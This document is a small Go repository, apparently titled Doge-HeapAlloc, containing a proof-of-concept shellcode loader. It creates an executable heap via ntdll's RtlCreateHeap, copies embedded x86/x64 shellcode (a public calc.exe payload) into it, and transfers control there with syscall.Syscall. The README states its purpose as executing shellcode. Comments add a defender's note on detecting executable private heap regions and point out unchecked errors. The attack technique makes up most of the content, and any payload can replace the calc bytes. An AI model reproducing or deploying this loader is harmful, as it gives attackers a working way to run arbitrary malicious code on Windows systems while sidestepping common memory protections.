├── HeapAlloc.go
└── README.md

/HeapAlloc.go:
--------------------------------------------------------------------------------
// HeapAlloc.go — proof of concept that places a byte buffer in a heap created
// with HEAP_CREATE_ENABLE_EXECUTE and then transfers control to it.
//
// Windows only: every call below is resolved lazily from ntdll.dll; the
// equivalent kernel32 path (HeapCreate/HeapAlloc) is left in as comments.
//
// For defenders, the distinguishing artifact is a private heap created with
// the execute flag — executable memory not backed by any image — followed by a
// direct call into it. Heap-permission monitoring and memory scanning for
// executable private regions are the controls aimed at exactly this sequence.
package main

import (
	"syscall"
	"unsafe"
)

var (
	// Lazy DLL handle; the kernel32 variant is the commented-out alternative.
	//kernel = syscall.NewLazyDLL("kernel32.dll")
	ntdll = syscall.NewLazyDLL("ntdll.dll")

	// RtlCreateHeap is the ntdll export that HeapCreate wraps.
	//HeapCreate = kernel.NewProc("HeapCreate")
	RtlCreateHeap = ntdll.NewProc("RtlCreateHeap")

	// RtlAllocateHeap is the ntdll export that HeapAlloc wraps.
	//HeapAlloc = kernel.NewProc("HeapAlloc")
	RtlAllocateHeap = ntdll.NewProc("RtlAllocateHeap")
)

// allocfunc creates a private, growable, executable heap sized shellSize and
// allocates one zeroed block of shellSize bytes from it.
//
// Flags on RtlCreateHeap: 0x00040000 is HEAP_CREATE_ENABLE_EXECUTE and
// 0x00000002 is HEAP_GROWABLE; HeapBase is 0 (let the system choose), reserve
// and commit size are both shellSize, Lock and Parameters are 0.
// 0x00000008 on RtlAllocateHeap is HEAP_ZERO_MEMORY.
//
// Returns the address of the allocated block, or 0 when RtlAllocateHeap
// returned 0. NOTE(review): the error result is never populated — the
// failure branch returns (0, nil) exactly like success — and the results of
// both .Call invocations are otherwise unchecked, so a heap handle of 0 is
// passed straight into RtlAllocateHeap.
func allocfunc(shellSize uintptr) (uintptr, error) {
	//hhandl, _, _ := HeapCreate.Call(0x00040000, shellSize, 0)
	hhandl, _, _ := RtlCreateHeap.Call(0x00040000|0x00000002, 0, shellSize, shellSize, 0, 0)

	//alloc, _, _ := HeapAlloc.Call(hhandl, 0x00000008, shellSize)
	alloc, _, _ := RtlAllocateHeap.Call(hhandl, 0x00000008, shellSize)
	if alloc == 0 {
		// Same nil error as the success path; callers cannot tell failure apart.
		return 0, nil
	}
	return alloc, nil
}

// main copies the embedded payload into the executable heap block and calls
// into it. The bytes are the public win-exec-calc-shellcode referenced in the
// comment below. No step's result is verified.
func main() {
	var shellcode = []byte{
		//calc.exe https://github.com/peterferrie/win-exec-calc-shellcode
		0x31, 0xc0, 0x50, 0x68, 0x63, 0x61, 0x6c, 0x63,
		0x54, 0x59, 0x50, 0x40, 0x92, 0x74, 0x15, 0x51,
		0x64, 0x8b, 0x72, 0x2f, 0x8b, 0x76, 0x0c, 0x8b,
		0x76, 0x0c, 0xad, 0x8b, 0x30, 0x8b, 0x7e, 0x18,
		0xb2, 0x50, 0xeb, 0x1a, 0xb2, 0x60, 0x48, 0x29,
		0xd4, 0x65, 0x48, 0x8b, 0x32, 0x48, 0x8b, 0x76,
		0x18, 0x48, 0x8b, 0x76, 0x10, 0x48, 0xad, 0x48,
		0x8b, 0x30, 0x48, 0x8b, 0x7e, 0x30, 0x03, 0x57,
		0x3c, 0x8b, 0x5c, 0x17, 0x28, 0x8b, 0x74, 0x1f,
		0x20, 0x48, 0x01, 0xfe, 0x8b, 0x54, 0x1f, 0x24,
		0x0f, 0xb7, 0x2c, 0x17, 0x8d, 0x52, 0x02, 0xad,
		0x81, 0x3c, 0x07, 0x57, 0x69, 0x6e, 0x45, 0x75,
		0xef, 0x8b, 0x74, 0x1f, 0x1c, 0x48, 0x01, 0xfe,
		0x8b, 0x34, 0xae, 0x48, 0x01, 0xf7, 0x99, 0xff,
		0xd7,
	}

	// The error is discarded — allocfunc never sets it anyway — so a failed
	// allocation reaches WriteMemory with baseA == 0 and the copy loop writes
	// through a zero base.
	baseA, _ := allocfunc(uintptr(len(shellcode)))

	WriteMemory(shellcode, baseA)

	/*
	   Earlier variant, superseded by WriteMemory: reinterpret the block as a
	   fixed-size byte array and copy with a range loop.

	   basePtr := (*[990000]byte)(unsafe.Pointer(baseA))

	   for i, byte0 := range shellcode {
	   	basePtr[i] = byte0
	   }

	*/

	// syscall.Syscall uses its first argument as the address to call, so this
	// transfers control to the heap block with zero arguments. The three
	// results (r1, r2, errno) are discarded.
	syscall.Syscall(baseA, 0, 0, 0, 0)
}

// WriteMemory copies inbuf byte by byte to the raw address destination.
//
// destination is trusted to point at at least len(inbuf) writable bytes;
// nothing here checks it, and a destination of 0 is written through as well.
// Rebuilding an unsafe.Pointer from a uintptr expression is the conversion
// go vet's unsafeptr check reports as possible misuse, because the address
// is not tracked by the garbage collector.
func WriteMemory(inbuf []byte, destination uintptr) {
	for index := uint32(0); index < uint32(len(inbuf)); index++ {
		writePtr := unsafe.Pointer(destination + uintptr(index))
		v := (*byte)(writePtr)
		*v = inbuf[index]
	}
}
--------------------------------------------------------------------------------

/README.md:
--------------------------------------------------------------------------------
# Doge-HeapAlloc

Use HeapAlloc to execute shellcode.
--------------------------------------------------------------------------------